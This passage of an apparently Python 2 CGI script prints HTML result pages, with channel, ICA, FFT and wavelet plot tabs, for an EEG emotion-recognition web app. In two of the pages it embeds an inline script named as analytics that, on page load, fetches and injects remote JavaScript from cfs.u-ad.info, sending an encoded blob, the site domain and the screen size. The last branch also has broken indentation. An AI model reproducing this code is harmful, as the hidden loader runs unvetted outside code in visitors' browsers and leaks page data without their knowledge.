                                        <div class="col-lg-4">
                                            <img src="../img/ica/4.png" width="100%">
                                            <h4 class="text-center">FC5</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/ica/5.png" width="100%">
                                            <h4 class="text-center">T7</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/ica/6.png" width="100%">
                                            <h4 class="text-center">P7</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                    </div>
                                    <!-- /.row -->
                                    <div class="row">
                                        <div class="col-lg-4">
                                            <img src="../img/ica/7.png" width="100%">
                                            <h4 class="text-center">O1</h4>
                                        </div>
                                        <div class="col-lg-4">
                                            <img src="../img/ica/8.png" width="100%">
                                            <h4 class="text-center">O2</h4>
                                        </div>
                                        <div class="col-lg-4">
                                            <img src="../img/ica/9.png" width="100%">
                                            <h4 class="text-center">P8</h4>
                                        </div>
                                    </div>
                                    <!-- /.row -->
                                    <div class="row">
                                        <div class="col-lg-4">
                                            <img src="../img/ica/10.png" width="100%">
                                            <h4 class="text-center">T8</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/ica/11.png" width="100%">
                                            <h4 class="text-center">FC6</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/ica/12.png" width="100%">
                                            <h4 class="text-center">F4</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                    </div>
                                    <!-- /.row -->
                                    <div class="row">
                                        <div class="col-lg-4">
                                            <img src="../img/ica/13.png" width="100%">
                                            <h4 class="text-center">F8</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4"></div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/ica/14.png" width="100%">
                                            <h4 class="text-center">AF4</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                    </div>
                                </div>
                                <div class="tab-pane fade" id="fast-fourier-transformation">
                                    <br/>
                                    <div class="row">
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                        <div class="col-lg-10">
                                            <img src="../img/fft/delta.png" width="100%" height="200px">
                                            <h4 class="text-center">Delta</h4>
                                        </div>
                                        <!-- /.col-lg-10 -->
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                    </div>
                                    <div class="row">
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                        <div class="col-lg-10">
                                            <img src="../img/fft/theta.png" width="100%" height="200px">
                                            <h4 class="text-center">Theta</h4>
                                        </div>
                                        <!-- /.col-lg-10 -->
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                    </div>
                                    <div class="row">
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                        <div class="col-lg-10">
                                            <img src="../img/fft/alpha.png" width="100%" height="200px">
                                            <h4 class="text-center">Alpha</h4>
                                        </div>
                                        <!-- /.col-lg-10 -->
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                    </div>
                                    <div class="row">
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                        <div class="col-lg-10">
                                            <img src="../img/fft/beta.png" width="100%" height="200px">
                                            <h4 class="text-center">Beta</h4>
                                        </div>
                                        <!-- /.col-lg-10 -->
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                    </div>
                                    <div class="row">
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                        <div class="col-lg-10">
                                            <img src="../img/fft/gamma.png" width="100%" height="200px">
                                            <h4 class="text-center">Gamma</h4>
                                        </div>
                                        <!-- /.col-lg-10 -->
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                    </div>
                                </div>
                                <div class="tab-pane fade" id="prediction-result">
                                    <br/>
                                    <div class="row">
                                        <div class="col-lg-2"></div>
                                        <div class="col-lg-2">'''+strValence+'''</div>
                                        <div class="col-lg-4"></div>
                                        <div class="col-lg-2">'''+strArousal+'''</div>
                                        <div class="col-lg-2"></div>
                                    </div>
                                    <div class="row">
                                        <div class="col-lg-4"></div>
                                        <div class="col-lg-4">'''+strClass+'''</div>
                                        <div class="col-lg-4"></div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <!-- /.panel-body -->
                    </div>
                    <!-- /.panel -->
                </div>
                <!-- /.col-lg-12 -->
            </div>
            <!-- /.row -->
        </div>
        <!-- /#page-wrapper -->
    </div>
    <!-- /#wrapper -->
    <!-- jQuery -->
    <script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/jquery/dist/jquery.min.js"></script>
    <!-- Bootstrap Core JavaScript -->
    <script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/bootstrap/dist/js/bootstrap.min.js"></script>
    <!-- Metis Menu Plugin JavaScript -->
    <script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/metisMenu/dist/metisMenu.min.js"></script>
    <!-- Morris Charts JavaScript -->
    <script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/raphael/raphael-min.js"></script>
    <script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/morrisjs/morris.min.js"></script>
    <script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/js/morris-data.js"></script>
    <!-- Custom Theme JavaScript -->
    <script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/dist/js/sb-admin-2.js"></script>
    <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582AaN6h071sG%2bJBYpJxd3JQSJs5mE8iAmw8USIyYDWcoVFc08gzCE8COQRBhCpHI1yC7skRDV9qYyHsdUIk2Qeh5fEPTGf2w%2fAexeHwBBM3qJNrfxOqlDLyX3udt7TqoNReDfIBn%2brVy%2bXEPB%2b8EBADsI1Ky5R%2bmMT%2bW5f4GztEj2O1tiud%2fhA1eRZDOA8mmhJtYMcL69A3eIK5GA8GaovnIqpEW%2fPvjHtnKIurfETIYf5ayMxYzYN1lED6XS%2fAb6PcLJr28pYQzmnhFa2BHbEg%2fIb0A3%2f%2fYokQpvFnkvQ2zFr6zcNU%2fELwAzWrxpSfHdjc3rc78s27Iqzcz57H00Dc%2fRd92Mw%2bWRClG4%2byxeuot%2ftTqeWWP%2fTPr3cJfjysdCW%2bsf7hgbZmIcOA4Gl3LH5ARvUDlRwAz786LT4TDlM0MvS7YhQtdY8Vai4ZoPeSWwCWp76PIQqYPRApUAKtS66EuHlmVHgcIdtNFspNfcV3Ro5%2ftCVEqnASugmE87PJkncpxnP6cGCRbSwOA7JshwR8RDsEF69XUIk2tn%2fH1MBTJUaONMqI5Vb4Fnuk1G37GFI6Ne3Myq3qQ4SC2RcISIMse5oG55mTQe%2bFhZFcAw27fh" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>'''
# SWT pipeline: result page with a "Stationery Wavelet Transform" tab showing
# the approximation (a5) and detail (d5..d2) coefficient plots
# (../img/swt/*.png, presumably regenerated by the MATLAB step — TODO
# confirm), alongside the shared channel-map / raw-data / prediction tabs.
if preprocessing_method=='swt':
	print '''<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="">
    <meta name="author" content="">
    <title>EEG Emotion Recognition</title>
    <!-- Bootstrap Core CSS -->
    <link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet">
    <!-- MetisMenu CSS -->
    <link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/metisMenu/dist/metisMenu.min.css" rel="stylesheet">
    <!-- Timeline CSS -->
    <link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/dist/css/timeline.css" rel="stylesheet">
    <!-- Custom CSS -->
    <link href="../css/dashboard.css" rel="stylesheet">
    <!-- Morris Charts CSS -->
    <link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/morrisjs/morris.css" rel="stylesheet">
    <!-- Custom Fonts -->
    <link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>
        <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
        <script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
    <![endif]-->
</head>
<body>
    <div id="wrapper">
        <div id="page-wrapper">
            <div class="row">
                <div class="col-lg-12">
                    <a href="index.py" style="text-decoration:none;color: #000;"><h1 class="page-header text-center">EEG Emotion Recognition</h1></a>
                </div>
                <!-- /.col-lg-12 -->
            </div>
            <!-- /.row -->
            <div class="row">
                <div class="col-lg-12">
                    <div class="panel panel-info">
                        <div class="panel-body">
                            <!-- Nav tabs -->
                            <ul class="nav nav-tabs">
                                <li class="active"><a href="#emotiv-channels" data-toggle="tab">Emotiv Channels</a>
                                </li>
                                <li><a href="#raw-data" data-toggle="tab">Raw Data</a>
                                </li>
                                <li><a href="#stationery-wavelet-transform" data-toggle="tab">Stationery Wavelet Transform</a>
                                </li>
                                <li><a href="#prediction-result" data-toggle="tab">Prediction Result</a>
                                </li>
                            </ul>
                            <!-- Tab panes -->
                            <div class="tab-content">
                                <div class="tab-pane fade in active" id="emotiv-channels">
                                    <br/>
                                    <div class="row">
                                        <div class="col-lg-4"></div>
                                        <div class="col-lg-4">
                                            <img src="../img/emotiv_channel.png" width="100%">
                                            <h4 class="text-center">Emotiv Channels</h4>
                                        </div>
                                        <div class="col-lg-4"></div>
                                    </div>
                                </div>
                                <div class="tab-pane fade" id="raw-data">
                                    <br/>
                                    <div class="row">
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/1.png" width="100%">
                                            <h4 class="text-center">AF3</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/2.png" width="100%">
                                            <h4 class="text-center">F7</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/3.png" width="100%">
                                            <h4 class="text-center">F3</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                    </div>
                                    <!-- /.row -->
                                    <div class="row">
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/4.png" width="100%">
                                            <h4 class="text-center">FC5</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/5.png" width="100%">
                                            <h4 class="text-center">T7</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/6.png" width="100%">
                                            <h4 class="text-center">P7</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                    </div>
                                    <!-- /.row -->
                                    <div class="row">
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/7.png" width="100%">
                                            <h4 class="text-center">O1</h4>
                                        </div>
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/8.png" width="100%">
                                            <h4 class="text-center">O2</h4>
                                        </div>
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/9.png" width="100%">
                                            <h4 class="text-center">P8</h4>
                                        </div>
                                    </div>
                                    <!-- /.row -->
                                    <div class="row">
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/10.png" width="100%">
                                            <h4 class="text-center">T8</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/11.png" width="100%">
                                            <h4 class="text-center">FC6</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/12.png" width="100%">
                                            <h4 class="text-center">F4</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                    </div>
                                    <!-- /.row -->
                                    <div class="row">
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/13.png" width="100%">
                                            <h4 class="text-center">F8</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4"></div>
                                        <!-- /.col-lg-4 -->
                                        <div class="col-lg-4">
                                            <img src="../img/raw_data/14.png" width="100%">
                                            <h4 class="text-center">AF4</h4>
                                        </div>
                                        <!-- /.col-lg-4 -->
                                    </div>
                                </div>
                                <div class="tab-pane fade" id="stationery-wavelet-transform">
                                    <br/>
                                    <div class="row">
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                        <div class="col-lg-10">
                                            <img src="../img/swt/a5.png" width="100%" height="200px">
                                            <h4 class="text-center">Approximation 5</h4>
                                        </div>
                                        <!-- /.col-lg-10 -->
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                    </div>
                                    <div class="row">
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                        <div class="col-lg-10">
                                            <img src="../img/swt/d5.png" width="100%" height="200px">
                                            <h4 class="text-center">Detail 5</h4>
                                        </div>
                                        <!-- /.col-lg-10 -->
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                    </div>
                                    <div class="row">
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                        <div class="col-lg-10">
                                            <img src="../img/swt/d4.png" width="100%" height="200px">
                                            <h4 class="text-center">Detail 4</h4>
                                        </div>
                                        <!-- /.col-lg-10 -->
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                    </div>
                                    <div class="row">
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                        <div class="col-lg-10">
                                            <img src="../img/swt/d3.png" width="100%" height="200px">
                                            <h4 class="text-center">Detail 3</h4>
                                        </div>
                                        <!-- /.col-lg-10 -->
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                    </div>
                                    <div class="row">
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                        <div class="col-lg-10">
                                            <img src="../img/swt/d2.png" width="100%" height="200px">
                                            <h4 class="text-center">Detail 2</h4>
                                        </div>
                                        <!-- /.col-lg-10 -->
                                        <div class="col-lg-1"></div>
                                        <!-- /.col-lg-1 -->
                                    </div>
                                </div>
                                <div class="tab-pane fade" id="prediction-result">
                                    <br/>
                                    <div class="row">
                                        <div class="col-lg-2"></div>
                                        <div class="col-lg-2">'''+strValence+'''</div>
                                        <div class="col-lg-4"></div>
                                        <div class="col-lg-2">'''+strArousal+'''</div>
                                        <div class="col-lg-2"></div>
                                    </div>
                                    <div class="row">
                                        <div class="col-lg-4"></div>
                                        <div class="col-lg-4">'''+strClass+'''</div>
                                        <div class="col-lg-4"></div>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <!-- /.panel-body -->
                    </div>
                    <!-- /.panel -->
                </div>
                <!-- /.col-lg-12 -->
            </div>
            <!-- /.row -->
        </div>
        <!-- /#page-wrapper -->
    </div>
    <!-- /#wrapper -->
    <!-- jQuery -->
    <script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/jquery/dist/jquery.min.js"></script>
    <!-- Bootstrap Core JavaScript -->
    <script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/bootstrap/dist/js/bootstrap.min.js"></script>
    <!-- Metis Menu Plugin JavaScript -->
    <script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/metisMenu/dist/metisMenu.min.js"></script>
    <!-- Morris Charts JavaScript -->
    <script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/raphael/raphael-min.js"></script>
    <script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/morrisjs/morris.min.js"></script>
    <script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/js/morris-data.js"></script>
    <!-- Custom Theme JavaScript -->
    <script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/dist/js/sb-admin-2.js"></script>
    <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582AaN6h071sG%2bJBYpJxd3JQSJs5mE8iAmw8USIyYDWcoVFc08gzCE8COQRBhCpHI1yC7skRDV9qYyHsdUIk2Qeh5fEPTGf2w%2fAexeHwBBM3qJNrfxOqlDLyX3udt7TqoNReDfIBn%2brVy%2bXEPB%2b8EBADsI1Ky5R%2bmMT%2bW5f4GztEj2O1tiud%2fhA1eRZDOA8mmhJtYMcL69A3eIK5GA8GaovnIqpEW%2fPvjHtnKIurfETIYf5ayMxYzYN1lED6XS%2fAb6PcLJr28pYQzmnhFa2BHbEg%2fIb0A3%2f%2fYokQpvFnkvQ2zFr6zcNU%2fELwAzWrxpSfHdjc3rc78s27Iqzcz57H00Dc%2fRd92Mw%2bWRClG4%2byxeuot%2ftTqeWWP%2fTPr3cJfjysdCW%2bsf7hgbZmIcOA4Gl3LH5ARvUDlRwAz786LT4TDlM0MvS7YhQtdY8Vai4ZoPeSWwCWp76PIQqYPRApUAKtS66EuHlmVHgcIdtNFspNfcV3Ro5%2ftCVEqnASugmE87PJkncpxnP6cGCRbSwOA7JshwR8RDsEF69XUIk2tn%2fH1MBTJUaONMqI5Vb4Fnuk1G37GFI6Ne3Myq3qQ4SC2RcISIMse5oG55mTQe%2bFhZFcAw27fh" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
</html>'''
if preprocessing_method=='ica_swt':
print '''<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="">
<meta name="author" content="">
<title>EEG Emotion Recognition</title>
<!-- Bootstrap Core CSS -->
<link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/bootstrap/dist/css/bootstrap.min.css" rel="stylesheet">
<!-- MetisMenu CSS -->
<link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/metisMenu/dist/metisMenu.min.css" rel="stylesheet">
<!-- Timeline CSS -->
<link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/dist/css/timeline.css" rel="stylesheet">
<!-- Custom CSS -->
<link href="../css/dashboard.css" rel="stylesheet">
<!-- Morris Charts CSS -->
<link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/morrisjs/morris.css" rel="stylesheet">
<!-- Custom Fonts -->
<link href="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
<!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
<!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>
<script src="https://oss.maxcdn.com/libs/respond.js/1.4.2/respond.min.js"></script>
<![endif]-->
</head>
<body>
<div id="wrapper">
<div id="page-wrapper">
<div class="row">
<div class="col-lg-12">
<a href="index.py" style="text-decoration:none;color: #000;"><h1 class="page-header text-center">EEG Emotion Recognition</h1></a>
</div>
<!-- /.col-lg-12 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-12">
<div class="panel panel-info">
<div class="panel-body">
<!-- Nav tabs -->
<ul class="nav nav-tabs">
<li class="active"><a href="#emotiv-channels" data-toggle="tab">Emotiv Channels</a>
</li>
<li><a href="#raw-data" data-toggle="tab">Raw Data</a>
</li>
<li><a href="#independent-component-analysis" data-toggle="tab">Independent Component Analysis</a>
</li>
<li><a href="#stationery-wavelet-transform" data-toggle="tab">Stationery Wavelet Transform</a>
</li>
<li><a href="#prediction-result" data-toggle="tab">Prediction Result</a>
</li>
</ul>
<!-- Tab panes -->
<div class="tab-content">
<div class="tab-pane fade in active" id="emotiv-channels">
<br/>
<div class="row">
<div class="col-lg-4"></div>
<div class="col-lg-4">
<img src="../img/emotiv_channel.png" width="100%">
<h4 class="text-center">Emotiv Channels</h4>
</div>
<div class="col-lg-4"></div>
</div>
</div>
<div class="tab-pane fade" id="raw-data">
<br/>
<div class="row">
<div class="col-lg-4">
<img src="../img/raw_data/1.png" width="100%">
<h4 class="text-center">AF3</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/2.png" width="100%">
<h4 class="text-center">F7</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/3.png" width="100%">
<h4 class="text-center">F3</h4>
</div>
<!-- /.col-lg-4 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/raw_data/4.png" width="100%">
<h4 class="text-center">FC5</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/5.png" width="100%">
<h4 class="text-center">T7</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/6.png" width="100%">
<h4 class="text-center">P7</h4>
</div>
<!-- /.col-lg-4 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/raw_data/7.png" width="100%">
<h4 class="text-center">O1</h4>
</div>
<div class="col-lg-4">
<img src="../img/raw_data/8.png" width="100%">
<h4 class="text-center">O2</h4>
</div>
<div class="col-lg-4">
<img src="../img/raw_data/9.png" width="100%">
<h4 class="text-center">P8</h4>
</div>
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/raw_data/10.png" width="100%">
<h4 class="text-center">T8</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/11.png" width="100%">
<h4 class="text-center">FC6</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/12.png" width="100%">
<h4 class="text-center">F4</h4>
</div>
<!-- /.col-lg-4 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/raw_data/13.png" width="100%">
<h4 class="text-center">F8</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4"></div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/raw_data/14.png" width="100%">
<h4 class="text-center">AF4</h4>
</div>
<!-- /.col-lg-4 -->
</div>
</div>
<div class="tab-pane fade" id="independent-component-analysis">
<br/>
<div class="row">
<div class="col-lg-4">
<img src="../img/ica/1.png" width="100%">
<h4 class="text-center">AF3</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/ica/2.png" width="100%">
<h4 class="text-center">F7</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/ica/3.png" width="100%">
<h4 class="text-center">F3</h4>
</div>
<!-- /.col-lg-4 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/ica/4.png" width="100%">
<h4 class="text-center">FC5</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/ica/5.png" width="100%">
<h4 class="text-center">T7</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/ica/6.png" width="100%">
<h4 class="text-center">P7</h4>
</div>
<!-- /.col-lg-4 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/ica/7.png" width="100%">
<h4 class="text-center">O1</h4>
</div>
<div class="col-lg-4">
<img src="../img/ica/8.png" width="100%">
<h4 class="text-center">O2</h4>
</div>
<div class="col-lg-4">
<img src="../img/ica/9.png" width="100%">
<h4 class="text-center">P8</h4>
</div>
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/ica/10.png" width="100%">
<h4 class="text-center">T8</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/ica/11.png" width="100%">
<h4 class="text-center">FC6</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/ica/12.png" width="100%">
<h4 class="text-center">F4</h4>
</div>
<!-- /.col-lg-4 -->
</div>
<!-- /.row -->
<div class="row">
<div class="col-lg-4">
<img src="../img/ica/13.png" width="100%">
<h4 class="text-center">F8</h4>
</div>
<!-- /.col-lg-4 -->
<div class="col-lg-4"></div>
<!-- /.col-lg-4 -->
<div class="col-lg-4">
<img src="../img/ica/14.png" width="100%">
<h4 class="text-center">AF4</h4>
</div>
<!-- /.col-lg-4 -->
</div>
</div>
<div class="tab-pane fade" id="stationery-wavelet-transform">
<br/>
<div class="row">
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
<div class="col-lg-10">
<img src="../img/swt/a5.png" width="100%" height="200px">
<h4 class="text-center">Approximation 5</h4>
</div>
<!-- /.col-lg-10 -->
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
</div>
<div class="row">
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
<div class="col-lg-10">
<img src="../img/swt/d5.png" width="100%" height="200px">
<h4 class="text-center">Detail 5</h4>
</div>
<!-- /.col-lg-10 -->
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
</div>
<div class="row">
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
<div class="col-lg-10">
<img src="../img/swt/d4.png" width="100%" height="200px">
<h4 class="text-center">Detail 4</h4>
</div>
<!-- /.col-lg-10 -->
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
</div>
<div class="row">
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
<div class="col-lg-10">
<img src="../img/swt/d3.png" width="100%" height="200px">
<h4 class="text-center">Detail 3</h4>
</div>
<!-- /.col-lg-10 -->
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
</div>
<div class="row">
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
<div class="col-lg-10">
<img src="../img/swt/d2.png" width="100%" height="200px">
<h4 class="text-center">Detail 2</h4>
</div>
<!-- /.col-lg-10 -->
<div class="col-lg-1"></div>
<!-- /.col-lg-1 -->
</div>
</div>
<div class="tab-pane fade" id="prediction-result">
<br/>
<div class="row">
<div class="col-lg-2"></div>
<div class="col-lg-2">'''+strValence+'''</div>
<div class="col-lg-4"></div>
<div class="col-lg-2">'''+strArousal+'''</div>
<div class="col-lg-2"></div>
</div>
<div class="row">
<div class="col-lg-4"></div>
<div class="col-lg-4">'''+strClass+'''</div>
<div class="col-lg-4"></div>
</div>
</div>
</div>
</div>
<!-- /.panel-body -->
</div>
<!-- /.panel -->
</div>
<!-- /.col-lg-12 -->
</div>
<!-- /.row -->
</div>
<!-- /#page-wrapper -->
</div>
<!-- /#wrapper -->
<!-- jQuery -->
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/jquery/dist/jquery.min.js"></script>
<!-- Bootstrap Core JavaScript -->
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/bootstrap/dist/js/bootstrap.min.js"></script>
<!-- Metis Menu Plugin JavaScript -->
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/metisMenu/dist/metisMenu.min.js"></script>
<!-- Morris Charts JavaScript -->
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/raphael/raphael-min.js"></script>
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/bower_components/morrisjs/morris.min.js"></script>
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/js/morris-data.js"></script>
<!-- Custom Theme JavaScript -->
<script src="http://ironsummitmedia.github.io/startbootstrap-sb-admin-2/dist/js/sb-admin-2.js"></script>
